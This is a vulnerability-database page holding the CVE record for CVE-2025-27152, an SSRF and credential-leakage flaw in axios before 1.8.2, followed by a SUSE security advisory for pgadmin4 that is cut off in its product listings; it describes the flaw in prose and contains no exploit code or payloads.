Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-27152 (GCVE-0-2025-27152)
Vulnerability from cvelistv5
Published
2025-03-07 15:13
Modified
2025-03-07 19:32
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
References
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-27152",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-07T19:32:00.779211Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-07T19:32:17.511Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "axios",
"vendor": "axios",
"versions": [
{
"status": "affected",
"version": "\u003c 1.8.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-07T15:13:15.155Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"name": "https://github.com/axios/axios/issues/6463",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/issues/6463"
}
],
"source": {
"advisory": "GHSA-jr5f-v2jv-69x6",
"discovery": "UNKNOWN"
},
"title": "Possible SSRF and Credential Leakage via Absolute URL in axios Requests"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-27152",
"datePublished": "2025-03-07T15:13:15.155Z",
"dateReserved": "2025-02-19T16:30:47.779Z",
"dateUpdated": "2025-03-07T19:32:17.511Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-27152\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-03-07T16:15:38.773\",\"lastModified\":\"2025-03-07T20:15:38.560\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.\"},{\"lang\":\"es\",\"value\":\"axios es un cliente HTTP basado en promesas para el navegador y node.js. El problema ocurre cuando se pasan URL absolutas en lugar de URL relativas al protocolo a axios. Incluso si se configura ?baseURL, axios env\u00eda la solicitud a la URL absoluta especificada, lo que puede provocar una fuga de credenciales y SSRF. Este problema afecta tanto al uso del lado del servidor como del lado del cliente de axios. Este problema se solucion\u00f3 en 1.8.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/axios/axios/issues/6463\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-27152\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-03-07T19:32:00.779211Z\"}}}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-03-07T19:32:13.477Z\"}}], \"cna\": {\"title\": \"Possible SSRF and Credential Leakage via Absolute URL in axios Requests\", \"source\": {\"advisory\": \"GHSA-jr5f-v2jv-69x6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"axios\", \"product\": \"axios\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.8.2\"}]}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"name\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/axios/axios/issues/6463\", \"name\": \"https://github.com/axios/axios/issues/6463\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \\u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-03-07T15:13:15.155Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-27152\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-03-07T19:32:17.511Z\", \"dateReserved\": \"2025-02-19T16:30:47.779Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-03-07T15:13:15.155Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
suse-su-2025:1326-1
Vulnerability from csaf_suse
Published
2025-04-16 08:37
Modified
2025-04-16 08:37
Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user's session if two users authenticate simultaneously via ldap (bsc#1234840)
- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)
Patchnames
SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326,SUSE-SLE-Product-HPC-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP3-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP4-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP5-2025-1326,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2025-1326,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2025-1326,SUSE-Storage-7.1-2025-1326
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user\u0027s session if two users authenticate simultaneously via ldap (bsc#1234840)\n- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326,SUSE-SLE-Product-HPC-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP3-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP4-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP5-2025-1326,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2025-1326,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2025-1326,SUSE-Storage-7.1-2025-1326",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_1326-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:1326-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20251326-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:1326-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-April/039030.html"
},
{
"category": "self",
"summary": "SUSE Bug 1224295",
"url": "https://bugzilla.suse.com/1224295"
},
{
"category": "self",
"summary": "SUSE Bug 1234840",
"url": "https://bugzilla.suse.com/1234840"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-1907 page",
"url": "https://www.suse.com/security/cve/CVE-2023-1907/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-4068 page",
"url": "https://www.suse.com/security/cve/CVE-2024-4068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-04-16T08:37:10Z",
"generator": {
"date": "2025-04-16T08:37:10Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:1326-1",
"initial_release_date": "2025-04-16T08:37:10Z",
"revision_history": [
{
"date": "2025-04-16T08:37:10Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product_id": "pgadmin4-4.30-150300.3.18.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product_id": "pgadmin4-4.30-150300.3.18.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-doc-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product_id": "pgadmin4-4.30-150300.3.18.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product_id": "pgadmin4-4.30-150300.3.18.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product_id": "pgadmin4-4.30-150300.3.18.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Proxy 4.3",
"product": {
"name": "SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-proxy:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Server 4.3",
"product": {
"name": "SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-server:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Enterprise Storage 7.1",
"product": {
"name": "SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:ses:7.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
